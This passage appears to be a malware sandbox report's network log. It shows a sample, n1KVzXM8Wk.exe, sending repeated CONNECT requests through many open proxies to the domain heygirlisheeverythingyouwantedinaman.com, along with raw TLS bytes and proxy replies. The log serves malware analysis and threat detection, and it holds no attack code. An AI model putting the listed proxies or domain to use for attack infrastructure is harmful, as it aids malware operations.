                                                                                                      Feb 23, 2024 09:45:27.754836082 CET536INData Raw: 01 00 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 a8 34 98 ce 77 f5 7f 42 2f 5c 7d 4a cd e4 a6 28 69 f0 5f 5d 3d b8 38 c4 e8 7c 48 7f 49 e7 3a 63 25 f0 75 a1 24 96 62 86 76 46 86 bf c2 8e 5e 0e 14 54 b3 6b db a3 5f 80 23 6e 21
                                                                                                      Data Ascii: 0*H4wB/\}J(i_]=8|HI:c%u$bvF^Tk_#n!W$8zjp: };"yJD2B[`pQ0/c%_zdsngu?n6.&3MWoZL,J|*3Zr)*Q)noh
                                                                                                      Feb 23, 2024 09:45:27.754913092 CET57INData Raw: b3 52 26 39 7e fe 8f 8a b2 2e 08 85 d9 36 62 40 b8 30 82 47 26 cd 42 f8 90 a6 3e 1c 25 7c a7 17 cc 5c a3 9a 64 78 28 9f 1e 16 ba 87 d8 01 65 7a 16 03 03 00 04 0e 00 00 00
                                                                                                      Data Ascii: R&9~.6b@0G&B>%|\dx(ez
                                                                                                      Feb 23, 2024 09:45:27.757591009 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 4e ec dd 73 00 bf 5a 2b ba 0b ee 6d 31 02 5c 77 0f 89 1e ad 7a c5 dc e4 3d 01 cf d9 79 6b bb 26 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 9b ef 10 bd 3f 60 b0 64 30 d9 58 cb 76 1f b8 60 51 fb 2d 36 e4
                                                                                                      Data Ascii: %! NsZ+m1\wz=yk&(?`d0Xv`Q-65L]j]
                                                                                                      Feb 23, 2024 09:45:28.042707920 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 fd 5a d7 60 0a 56 21 7b 9b 36 8e ff f5 69 74 ea e1 13 65 13 fa a0 68 2b d2 04 39 15 da 6f 47 64 ff f6 e9 63 f2 c4 32 70
                                                                                                      Data Ascii: (Z`V!{6iteh+9oGdc2p


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1404192.168.2.453980171.244.140.160538826812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.205622911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.943897009 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.147125006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1405192.168.2.453498148.66.130.53470116812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.205651999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.365668058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.366035938 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.365936041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1406192.168.2.453754142.93.66.245426496812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.230886936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1407192.168.2.45403541.65.236.3719816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.255234003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.975202084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.975315094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.975254059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.975246906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.975127935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1408192.168.2.45407135.199.90.22588886812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.313906908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.539737940 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1409192.168.2.454057116.62.19.21578906812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.313908100 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.676192045 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1410192.168.2.453717107.180.101.226558736812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.320456028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.834405899 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1411192.168.2.454064103.216.49.15180806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.320904016 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1412192.168.2.453467142.54.239.141456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.337634087 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1413192.168.2.45084591.136.142.15380806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.351931095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1414192.168.2.45408973.210.245.19806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.369271994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.834409952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.219445944 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.147077084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1415192.168.2.453726166.62.85.184219466812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.369690895 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.365859985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1416192.168.2.45099950.62.134.139626076812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.369744062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.365854025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.366051912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.365936995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1417192.168.2.453046212.110.188.213344116812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.389631987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.474920988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.475481033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.475208044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1418192.168.2.45407445.138.87.23810806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.407510996 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1419192.168.2.45349092.246.139.113322446812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.407787085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1420192.168.2.45409631.207.38.66806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.415540934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.590538979 CET408INHTTP/1.1 405 Method Not Allowed
                                                                                                      Date: Fri, 23 Feb 2024 08:45:27 GMT
                                                                                                      Server: Apache
                                                                                                      Allow: GET,POST,OPTIONS,HEAD
                                                                                                      Content-Length: 224
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 43 4f 4e 4e 45 43 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for this URL.</p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1421192.168.2.45407679.110.196.14580816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.418751001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1422192.168.2.45096865.49.82.7402026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.418766975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.477874994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.647198915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1423192.168.2.45092051.75.125.208416496812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.424371958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.477854967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1424192.168.2.450981154.83.29.10530306812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.438575983 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.245099068 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1425192.168.2.454036117.160.250.16399996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.438812017 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.475092888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.941292048 CET221INHTTP/1.1 403 Access Denied
                                                                                                      Date: Fri, 23 Feb 2024 08:45:28 GMT
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-store
                                                                                                      Content-Type: text/html
                                                                                                      Content-Language: en
                                                                                                      Content-Length: 43
                                                                                                      Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                                      Data Ascii: You are not allowed to access the document.


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1426192.168.2.453731115.144.163.193110876812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.439819098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.477950096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.092981100 CET39INHTTP/1.0 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1427192.168.2.45121082.165.208.12631286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.464060068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.475120068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.475399971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.475214005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:51.475195885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1428192.168.2.454111104.16.105.198806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.464081049 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.552122116 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:27 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1429192.168.2.45407392.246.139.106333286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.473483086 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1430192.168.2.453734202.8.74.1080806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.477679968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.477971077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.997713089 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1431192.168.2.454092125.228.94.19941456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.495353937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1432192.168.2.4530721.15.62.1256786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.520071983 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1433192.168.2.45378851.75.42.12980806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.531693935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.586045027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.647233963 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1434192.168.2.45117092.205.110.47507096812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.537039042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.680195093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.684288979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.683681965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:51.709290981 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
